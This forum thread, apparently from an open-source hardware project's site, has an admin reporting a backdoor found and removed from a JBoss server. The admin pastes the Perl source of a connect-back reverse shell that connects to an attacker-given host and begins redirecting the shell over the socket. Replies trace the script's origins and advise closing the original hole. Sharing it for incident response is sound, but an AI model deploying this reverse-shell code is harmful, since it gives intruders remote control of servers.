Visit the forum instructions to learn how to post to the forum, enable email notifications, subscribe to a category to receive emails when there are new discussions (like a mailing list), bookmark discussions and to see other tips to get the most out of our forum!
Backdoor detected
-
Someone installed a backdoor on our server, but I have already removed it.Contents of the backdoor installed at $JBOSS_HOME/bin/connectback.txt.1 below:#!/usr/bin/perluse Socket;print "Team Carnivores Backdoor\n\n";if (!$ARGV[0]) {printf "Usage: $0 [Host] <Port>\n";exit(1);}print "[*] Dumping Arguments\n";$host = $ARGV[0];$port = 80;if ($ARGV[1]) {$port = $ARGV[1];}print "[*] Connecting...\n";$proto = getprotobyname('tcp') || die("Unknown Protocol\n");socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");my $target = inet_aton($host);if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {die("Unable to Connect\n");}print "[*] Spawning Shell\n";if (!fork( )) {open(STDIN,">&SERVER");
-
5 Comments sorted by
-
I ran a Google search on "Team Carnivores Backdoor". Not much in the way of results, except this. "Carnivore" was the project name for software system that would allow the FBI to collection formation. It is now called DCS1000. RIPA is a similar kind of thing that monitors internet traffic and email.
It seems unlikely to me that the FBI is interested in OSE. More likely a hacker organization is re-using the name.
- Mark
-
Yeah the 'Team Carnivores Backdoor' seems to have been edited in because other versions of the script i found have 'Data Cha0s Connect Back Backdoor' (http://itknowledgeexchange.techtarget.com/Irregular-Expressions/casper-rfi-crack-bot-part-10/) but otherwise identical code, this seems to be the more common version of the code.An Important thing to note is that someone has used another exploit to put this here, that means somewhere the system is open and should be closed.As an open project i doubt you have many secrets however every effort should be made to protect personal data and to maintain backups in a secure locations - preferable not connected to the internet.it's probably nothing (could be dropped by an automated system utilizing known exploits) but with the amount of hacking going around these days it's better to be safe than sorry - change passwords and make sure they strong, that sort of thing.-here's a thread that might be of interest from the ubuntu forums; http://ubuntuforums.org/showthread.php?p=9779391
Howdy, Stranger!
It looks like you're new here. If you want to get involved, click one of these buttons!
Categories
- All Discussions1,013
- General Discussion895
- ↳ Introductions145
- ↳ GVCS Development43
- ↳ GVCS Replication14
- ↳ Similar Projects, Partnerships and Open Culture53
- ↳ In the News14
- ↳ Education15
- ↳ Food18
- ↳ Energy42
- ↳ Health2
- ↳ Sustainable Architecture21
- ↳ Transportation10
- ↳ Household6
- ↳ IT, Web Infrastructure110
- ↳ Shared Personal Notes1
- ↳ New Communities10
- ↳ Other Languages34
- Project Management4
- Proposal and Development Status10
- Organizational Development26
- ↳ Team Logs4
- ↳ OSE Core Team1
- ↳ OSE IT - Core Team2
- ↳ OSE Collaboration Platform - Core Team6
- ↳ Resource Development3
- GVCS Technical Development52
- ↳ Open Source Car10
- ↳ Open Source Tractor1
- ↳ Gasifier Burner1
- ↳ CNC Torch Table5
- ↳ Agricultural Microcombine4
- ↳ Dimensional Sawmill1
- ↳ Documentation and Instructionals18
- OSE Dev0
- ↳ Trucktor0
- ↳ Microtrac0
- ↳ CNC Router0
- ↳ CNC Torch Table0
- ↳ Bulldozer0
- ↳ Backhoe0
- ↳ Car0
- ↳ 3D Printer0
- ↳ 3D Printer Laser Diode0
- ↳ Tractor0
- ↳ Powercube0
- ↳ Brick Press Controller0
In this Discussion
- elifarley January 2012
- mjn January 2012
- Sensor March 2012
- UtopianPragmatist January 2012
Tagged
- backdoor 1
Loading